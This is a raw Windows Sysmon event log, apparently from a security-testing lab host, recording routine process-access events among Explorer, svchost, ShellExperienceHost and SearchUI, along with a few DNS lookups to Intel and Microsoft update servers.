13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.945{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.945{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.945{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.945{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.945{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.945{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.930{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000011783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.940{59A5CD1D-8E56-6005-2E00-00000000A301}2464ocsp.intel.com0type: 5 ocsp.comodoca.com;::ffff:151.139.128.14;C:\Windows\sysmon64.exe 10341000x800000000000000011782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.055{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.055{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.976{59A5CD1D-8E46-6005-1600-00000000A301}15441840C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.976{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000011859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-1600-00000000A301}1544fe2.update.microsoft.com0type: 5 fe2.update.microsoft.com.nsatc.net;::ffff:40.70.224.149;::ffff:52.142.21.139;::ffff:20.188.78.189;C:\Windows\System32\svchost.exe 10341000x800000000000000011858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:33.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 